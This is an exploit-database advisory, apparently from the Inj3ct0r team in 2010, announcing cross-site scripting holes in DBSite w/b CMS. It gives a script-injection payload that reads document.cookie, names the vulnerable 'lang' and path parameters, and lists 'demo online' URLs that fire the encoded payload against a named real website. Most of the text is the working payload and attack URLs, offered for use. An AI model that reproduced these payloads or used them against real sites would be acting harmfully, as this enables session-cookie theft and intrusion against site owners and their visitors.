=========================================
DBSite w/b CMS Multiple XSS Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm The_Exploited member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: The_Exploited

@Title: DBSite w/b CMS Multiple XSS Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: [email protected]

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit: "><script>alert(document.cookie);</script>

@Demo 1: http://www.mysite.com/dbsite/index.php?page=default&amp;id=1&amp;&amp;lang=[XSS]

@Demo 2: http://www.mysite.com/dbsite/index.php?page=default&amp;id=1&amp;lang=&amp;[PATH]=[XSS]

@Demo online 1: http://www.pratoturismo.it/index.php?page=default&amp;id=8&amp;lang=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#37;28document.cookie&#37;29;&#37;3C/script&#37;3E

@Demo online 2: http://www.pratoturismo.it/index.php?page=default&amp;id=16&amp;lang=&amp;comune=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#37;28document.cookie&#37;29&#37;3C/script&#37;3E

@CMS Version: All

@CMS Download: http://www.liberologico.com/www/index.php?idx_menu=2&amp;idx_subMenu=0&amp;ID_scheda=31

Inj3ct0r.com [2010-04-21]